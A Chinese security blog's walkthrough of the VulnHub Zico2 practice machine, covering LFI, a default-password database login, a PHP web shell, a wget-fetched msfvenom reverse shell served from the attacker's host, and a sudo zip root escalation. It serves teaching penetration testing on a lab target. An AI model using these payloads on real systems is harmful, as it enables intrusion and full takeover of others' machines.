本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
大余安全
一个每日分享渗透小技巧的公众号
大家好,这里是 大余安全 的第 32 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.vulnhub.com/entry/zico2-1,210/
靶机难度:中级(CTF)
靶机发布日期:2017 年 6 月 19 日
靶机描述:
Zico 试图建立自己的网站,但在选择要使用的 CMS 时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主意吗?
提示:枚举,枚举和枚举!
目标:得到 root 权限 & 找到 flag.txt
请注意:对于所有这些计算机,我已经使用 VMware 运行下载的计算机。我将使用 Kali Linux 作为解决该 CTF 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
我们在 VM 中需要确定攻击目标的 IP 地址,需要使用 nmap 获取目标 IP 地址:
我们已经找到了此次 CTF 目标计算机 IP 地址:192.168.56.128
nmap 扫到了 22、80、111、50702 端口是开启的...
检出 Web 端口:
往下翻...
点击进入...
可以看到 tools.html 页面的 URL... 可能容易受到 LFI 的影响.... 试试
尝试获取 LFI 并成功使用 /../../etc/passwd.... 这边找到了 zico 用户...
前面提示让我们枚举,那我就枚举爆破看看...
/dbadmin / 浏览这个目录发现了 test_db.php 文件.... 访问它
可以看到一个 php 数据库登录页面以及版本名称....
使用默认密码 admin,成功登录进来...
可以看出,这里目前我发现有三种方法可以提权...
文件上传...LFI 注入... 写 shell 在页面插入...
查看到步骤后,按照进行即可...
<?php echo system($_GET["cmd"]); ?>
可以看到 php 代码脚本已保存在数据库中...
二、提权
这边执行了该文件... 可以看到位于 www-data 中....
这边思路就很简单了,先在本地创建个 shell...
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f elf > shell
开启 msf,我无奈的不知道为什么很简单的上传个 shell 上去,打开就能获得权限,可是死活就不行,我就只能求助 MSF 先把这台靶机拿下先,不然心态爆炸了...
<?php system("cd /tmp;wget http://192.168.56.103:8000/shell;chmod +x shell;./shell");?>
重新访问下即可...
这边成功获得权限... 这边进入 zico 用户后,发现了 wordpress 目录,进去肯定有一个 wp-config.php 文件可以查看账号密码的... 常识
sWfCsfJSPV9H3AmQzw8
ssh 成功登陆...
sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
可以看到用户可以以 root 用户身份运行 tar 和 zip 命令,而无需输入任何密码...
将文件 raj 压缩为文件,然后将其移动到 / tmp/nisha.zip 文件夹,最后将其解压缩,然后弹出 root 壳...
成功获得 root 权限和找到 flag.txt....
由于我们已经成功得到 root 权限 & 找到 flag.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
大余安全
一个全栈渗透小技巧的公众号